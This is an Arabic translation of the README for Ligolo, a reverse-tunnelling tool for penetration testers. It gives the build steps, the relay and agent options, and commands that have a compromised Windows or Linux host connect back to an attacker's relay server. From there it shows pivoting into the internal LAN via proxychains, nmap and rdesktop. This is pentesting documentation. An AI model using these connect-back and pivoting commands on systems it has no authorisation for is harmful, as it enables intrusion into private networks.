
النفق العكسي بسهولة لمختبرِي الاختراق، من مختبرِي الاختراق https://sysdream.com/

Ligolo هي أداة بسيطة وخفيفة لإنشاء أنفاق SOCKS5 أو TCP من اتصال عكسي بأمان تام (شهادة TLS بمنحنى إهليلجي).
إنها قابلة للمقارنة مع Meterpreter و Autoroute + Socks4a، ولكنها أكثر استقرارًا وسرعة.
لقد اخترقت خادم Windows / Linux / Mac أثناء تدقيقك الخارجي. هذا الخادم موجود داخل شبكة LAN وتريد إنشاء اتصالات بأجهزة أخرى على هذه الشبكة.
Ligolo يمكنه إعداد نفق للوصول إلى موارد الخادم الداخلي.
إعادة توجيه اتصال RDP باستخدام Proxychains (WAN).

هذه لقطة شاشة لاختبار سرعة بين مضيفين بسعة 100 ميجابايت/ثانية (ligolo / localrelay). قد يختلف الأداء اعتمادًا على تكوين النظام والشبكة.

تأكد من تثبيت Go وتشغيله.
cd `go env GOPATH`/src
git clone https://github.com/sysdream/ligolo
cd ligolo
make dep
make certs TLS_HOST=example.com
ملاحظة: يمكنك أيضًا استخدام شهاداتك الخاصة باستخدام خيار TLS_CERT في make عند استدعاء build. مثال: make build-all TLS_CERT=certs/mycert.pem.
make build-all
make build
Ligolo يتكون من وحدتين:
Localrelay مخصص للتشغيل على خادم التحكم (خادم المهاجم).
Ligolo هو البرنامج الذي يتم تشغيله على الكمبيوتر المستهدف.
بالنسبة لـ localrelay، يمكنك ترك الخيارات الافتراضية. سوف يستمع على كل واجهة على المنفذ 5555 وينتظر الاتصالات من ligolo (معامل -relayserver).
بالنسبة لـ ligolo، يجب عليك تحديد عنوان IP لخادم الترحيل (أو خادم الهجوم الخاص بك) باستخدام معامل -relayserver ip:port.
يمكنك استخدام خيار -h للمساعدة.
بمجرد إنشاء الاتصال بين Ligolo و LocalRelay، سيتم إعداد وكيل SOCKS5 على منفذ TCP 1080 على خادم الترحيل (يمكنك تغيير عنوان/منفذ TCP باستخدام خيار -localserver).
بعد ذلك، كل ما عليك فعله هو استخدام أداتك المفضلة (مثل Proxychains)، واستكشاف شبكة LAN الخاصة بالعميل.
على خادم الهجوم الخاص بك.
./bin/localrelay_linux_amd64
على المضيف المخترق.
> ligolo_windows_amd64.exe -relayserver LOCALRELAYSERVER:5555
بمجرد إنشاء الاتصال، قم بتعيين المعاملات التالية في ملف تكوين ProxyChains (على خادم الهجوم):
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 127.0.0.1 1080
استفد.
$ proxychains nmap -sT 10.0.0.0/24 -p 80 -Pn -A
$ proxychains rdesktop 10.0.0.123
خيارات Localrelay:
Usage of localrelay:
-certfile string
The TLS server certificate (default "certs/server.crt")
-keyfile string
The TLS server key (default "certs/server.key")
-localserver string
The local server address (your proxychains parameter) (default "127.0.0.1:1080")
-relayserver string
The relay server listening address (the connect-back address) (default "0.0.0.0:5555")
خيارات Ligolo:
Usage of ligolo:
-autorestart
Attempt to reconnect in case of an exception
-relayserver string
The relay server (the connect-back address) (default "127.0.0.1:5555")
-skipverify
Skip TLS certificate pinning verification
-targetserver string
The destination server (a RDP client, SSH server, etc.) - when not specified, Ligolo starts a socks5 proxy server
رخصة GNU العامة العامة الإصدار 3.0 (انظر LICENSING).